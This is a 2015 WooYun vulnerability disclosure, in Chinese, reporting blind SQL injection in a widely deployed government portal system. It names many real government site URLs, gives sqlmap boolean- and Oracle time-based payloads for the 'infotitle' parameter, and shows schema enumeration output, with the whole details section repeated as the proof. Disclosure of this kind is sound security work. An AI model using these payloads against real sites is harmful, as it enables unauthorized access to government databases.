当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0111283

漏洞标题:某在用政务系统SQL注入

相关厂商:四川易极天成信息技术有限公司

漏洞作者: 路人甲

提交时间:2015-05-04 16:42

修复时间:2015-08-06 18:16

公开时间:2015-08-06 18:16

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-04: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经确认,细节仅向厂商公开
2015-05-11: 细节向第三方安全合作伙伴开放
2015-07-02: 细节向核心白帽子及相关领域专家公开
2015-07-12: 细节向普通白帽子公开
2015-07-22: 细节向实习白帽子公开
2015-08-06: 细节向公众公开

简要描述:

一款用户量很大的政务系统

详细说明:

厂商:四川易极天成信息技术有限公司 用户量极大,这次总不会小厂商了吧。。搜索了一下,也没人提交。。

天成.png


问题出现在搜索这块infotitle参数存在 boolean-based blind与time-based blind型注入

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11


Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS
[15:03:15] [INFO] retrieved: HR
[15:04:10] [INFO] retrieved: IX
[15:05:15] [INFO] retrieved: MDSYS
[15:07:25] [INFO] retrieved: OE
[15:08:32] [INFO] retrieved: OLAPSYS


天成1.png


#2:

http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111


Place: GET
Parameter: infotitle
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111%' AND 9973=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(98)||CHR(87)||CHR(69),5) AND '%'='
---
[15:29:24] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:29:24] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:29:24] [INFO] fetching database (schema) names
[15:29:24] [INFO] fetching number of databases
[15:29:24] [INFO] retrieved: 
[15:29:24] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
2


天成2.png


#3:

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11


sqlmap identified the following injection points with a total of 346 HTTP(s) requests:
---
Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS


天成3.png


#4:

http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11


Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: infotitle=11%' AND 1983=1983 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: infotitle=11%' AND 5133=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(65)||CHR(117)||CHR(112),5) AND '%'='
---
[15:09:58] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:09:58] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:09:58] [INFO] fetching database (schema) names
[15:09:58] [INFO] fetching number of databases
[15:09:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:09:58] [INFO] retrieved: 24
[15:10:08] [INFO] retrieved: APEX_030200
[15:11:43] [INFO] retrieved: APPQOSSYS
[15:13:00] [INFO] retrieved: CTXSYS
[15:13:53] [INFO] retrieved: DBSNMP
[15:14:47] [INFO] retrieved: EGSS1
[15:15:33] [INFO] retrieved: EXFSYS
[15:16:26] [INFO] retrieved: FLOWS_FILES
[15:17:57] [INFO] retrieved: HR
[15:18:19] [INFO] retrieved: IX
[15:18:42] [INFO] retrieved: MDSYS
[15:19:27] [INFO] retrieved: OE
[15:19:49] [INFO] retrieved: OLAPSYS
[15:20:50] [INFO] retrieved: ORDDATA
[15:21:50] [INFO] retrieved: ORDSYS
[15:22:43] [INFO] retrieved: OUTLN
[15:23:29] [INFO] retrieved: OWBSYS
[15:24:21] [INFO] retrieved: PM
[15:24:44] [INFO] retrieved: SCOTT
[15:25:32] [INFO] retrieved: SH
[15:25:55] [INFO] retrieved: SYS
[15:26:26] [INFO] retrieved: SYSMAN
[15:27:18] [INFO] retrieved: SYSTEM
[15:28:11] [INFO] retrieved: WMSYS
[15:28:56] [INFO] retrieved: XDB
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EGSS1
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[15:29:26] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ldj.luzhou.gov.cn'


天成4.png


#5:

http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11


Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 9941=9941 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 8273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(74)||CHR(100)||CHR(79),5) AND '%'='
---
[15:03:18] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:03:18] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:03:18] [INFO] fetching database (schema) names
[15:03:18] [INFO] fetching number of databases
[15:03:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:03:18] [INFO] retrieved: 22
[15:03:54] [INFO] retrieved: CTXSYS
[15:06:19] [INFO] retrieved: DBSNMP
[15:09:06] [INFO] retrieved: DMSYS
[15:11:10] [INFO] retrieved: EGSS_USER
[15:15:31] [INFO] retrieved: EXFSYS
[15:18:35] [INFO] retrieved: HJEGSS
[15:21:43] [INFO] retrieved: HR


天成5.png


---------------------------------------------------------------
其他一些案例:

http://www.lzjyrd.gov.cn/template/v2/searchResult.jsp?infotitle=1
http://cuiping.gov.cn/template/hjbh/pagelist_search.jsp?infotitle=1
http://fsz.jiangyang.gov.cn/jyqsub8/template/jyq_fsz/pagelist_search.jsp?infotitle=1
http://www.lzhb.gov.cn/template/default/h_search.jsp?infotitle=1111
http://www.hjcom.gov.cn/template/hj_jingjixinxiju/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eacdda2780398&infotitle=1111
http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11
http://www.hjdaj.com/template/hjdaj/pagelist_search.jsp?fatherid=5c26e0783e83020b013e8c4bb2810441&infotitle=11
http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11
http://www.hjjsj.gov.cn/template/hjxzjj/pagelist_search.jsp?fatherid=5c26e0783fa445fb013fa93a42190254&infotitle=111
http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11
http://www.hjxblz.gov.cn/template/hjxblz/list_1.jsp?fatherid=5c26e0783ea435d3013ea5c27d6b002a&infotitle=11
http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111


漏洞证明:

厂商:四川易极天成信息技术有限公司 用户量极大,这次总不会小厂商了吧。。搜索了一下,也没人提交。。

天成.png


问题出现在搜索这块infotitle参数存在 boolean-based blind与time-based blind型注入

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11


Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS
[15:03:15] [INFO] retrieved: HR
[15:04:10] [INFO] retrieved: IX
[15:05:15] [INFO] retrieved: MDSYS
[15:07:25] [INFO] retrieved: OE
[15:08:32] [INFO] retrieved: OLAPSYS


天成1.png


#2:

http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111


Place: GET
Parameter: infotitle
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111%' AND 9973=DBMS_PIPE.RECEIVE_MESSAGE(CHR(106)||CHR(98)||CHR(87)||CHR(69),5) AND '%'='
---
[15:29:24] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:29:24] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:29:24] [INFO] fetching database (schema) names
[15:29:24] [INFO] fetching number of databases
[15:29:24] [INFO] retrieved: 
[15:29:24] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors 
2


天成2.png


#3:

http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11


sqlmap identified the following injection points with a total of 346 HTTP(s) requests:
---
Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 3061=3061 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11%' AND 4524=DBMS_PIPE.RECEIVE_MESSAGE(CHR(68)||CHR(108)||CHR(88)||CHR(120),5) AND '%'='
---
[14:47:10] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[14:47:10] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[14:47:10] [INFO] fetching database (schema) names
[14:47:10] [INFO] fetching number of databases
[14:47:10] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[14:47:10] [INFO] retrieved: 22
[14:47:40] [INFO] retrieved: CTXSYS
[14:50:05] [INFO] retrieved: DBSNMP
[14:52:41] [INFO] retrieved: DMSYS
[14:54:42] [INFO] retrieved: EGSS_USER
[14:58:19] [INFO] retrieved: aXFSYS
[15:00:46] [INFO] retrieved: HJEGSS


天成3.png


#4:

http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11


Place: GET
Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: infotitle=11%' AND 1983=1983 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: infotitle=11%' AND 5133=DBMS_PIPE.RECEIVE_MESSAGE(CHR(111)||CHR(65)||CHR(117)||CHR(112),5) AND '%'='
---
[15:09:58] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:09:58] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:09:58] [INFO] fetching database (schema) names
[15:09:58] [INFO] fetching number of databases
[15:09:58] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:09:58] [INFO] retrieved: 24
[15:10:08] [INFO] retrieved: APEX_030200
[15:11:43] [INFO] retrieved: APPQOSSYS
[15:13:00] [INFO] retrieved: CTXSYS
[15:13:53] [INFO] retrieved: DBSNMP
[15:14:47] [INFO] retrieved: EGSS1
[15:15:33] [INFO] retrieved: EXFSYS
[15:16:26] [INFO] retrieved: FLOWS_FILES
[15:17:57] [INFO] retrieved: HR
[15:18:19] [INFO] retrieved: IX
[15:18:42] [INFO] retrieved: MDSYS
[15:19:27] [INFO] retrieved: OE
[15:19:49] [INFO] retrieved: OLAPSYS
[15:20:50] [INFO] retrieved: ORDDATA
[15:21:50] [INFO] retrieved: ORDSYS
[15:22:43] [INFO] retrieved: OUTLN
[15:23:29] [INFO] retrieved: OWBSYS
[15:24:21] [INFO] retrieved: PM
[15:24:44] [INFO] retrieved: SCOTT
[15:25:32] [INFO] retrieved: SH
[15:25:55] [INFO] retrieved: SYS
[15:26:26] [INFO] retrieved: SYSMAN
[15:27:18] [INFO] retrieved: SYSTEM
[15:28:11] [INFO] retrieved: WMSYS
[15:28:56] [INFO] retrieved: XDB
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EGSS1
[*] EXFSYS
[*] FLOWS_FILES
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[15:29:26] [INFO] fetched data logged to text files under '/root/.sqlmap/output/ldj.luzhou.gov.cn'


天成4.png


#5:

http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11


Parameter: infotitle
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 9941=9941 AND '%'='
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11%' AND 8273=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(74)||CHR(100)||CHR(79),5) AND '%'='
---
[15:03:18] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
[15:03:18] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes
[15:03:18] [INFO] fetching database (schema) names
[15:03:18] [INFO] fetching number of databases
[15:03:18] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[15:03:18] [INFO] retrieved: 22
[15:03:54] [INFO] retrieved: CTXSYS
[15:06:19] [INFO] retrieved: DBSNMP
[15:09:06] [INFO] retrieved: DMSYS
[15:11:10] [INFO] retrieved: EGSS_USER
[15:15:31] [INFO] retrieved: EXFSYS
[15:18:35] [INFO] retrieved: HJEGSS
[15:21:43] [INFO] retrieved: HR


天成5.png


---------------------------------------------------------------
其他一些案例:

http://www.lzjyrd.gov.cn/template/v2/searchResult.jsp?infotitle=1
http://cuiping.gov.cn/template/hjbh/pagelist_search.jsp?infotitle=1
http://fsz.jiangyang.gov.cn/jyqsub8/template/jyq_fsz/pagelist_search.jsp?infotitle=1
http://www.lzhb.gov.cn/template/default/h_search.jsp?infotitle=1111
http://www.hjcom.gov.cn/template/hj_jingjixinxiju/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eacdda2780398&infotitle=1111
http://www.hjxgtzyj.gov.cn/template/hjgtzyj/pagelist_search.jsp?fatherid=5c26e0783ec48a15013ec5ff8fb10127&infotitle=11
http://www.hjdaj.com/template/hjdaj/pagelist_search.jsp?fatherid=5c26e0783e83020b013e8c4bb2810441&infotitle=11
http://www.hjgsj.gov.cn/template/hjgsj/pagelist_search.jsp?fatherid=5c26e0783ea435d3013ea60b49670122&infotitle=11
http://www.hjjsj.gov.cn/template/hjxzjj/pagelist_search.jsp?fatherid=5c26e0783fa445fb013fa93a42190254&infotitle=111
http://ldj.luzhou.gov.cn/template/default/soushuo.jsp?infotitle=11
http://www.hjxblz.gov.cn/template/hjxblz/list_1.jsp?fatherid=5c26e0783ea435d3013ea5c27d6b002a&infotitle=11
http://www.hjcbx.gov.cn/template/hjcbs/pagelist_search.jsp?fatherid=5c26e0783eab0d3e013eb16551cd057f&infotitle=111


修复方案:

。。。。。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-08 18:15

厂商回复:

CNVD未直接复现所述情况,已经转由CNCERT下发给四川分中心,由其后续协调网站管理单位处置。

最新状态:

暂无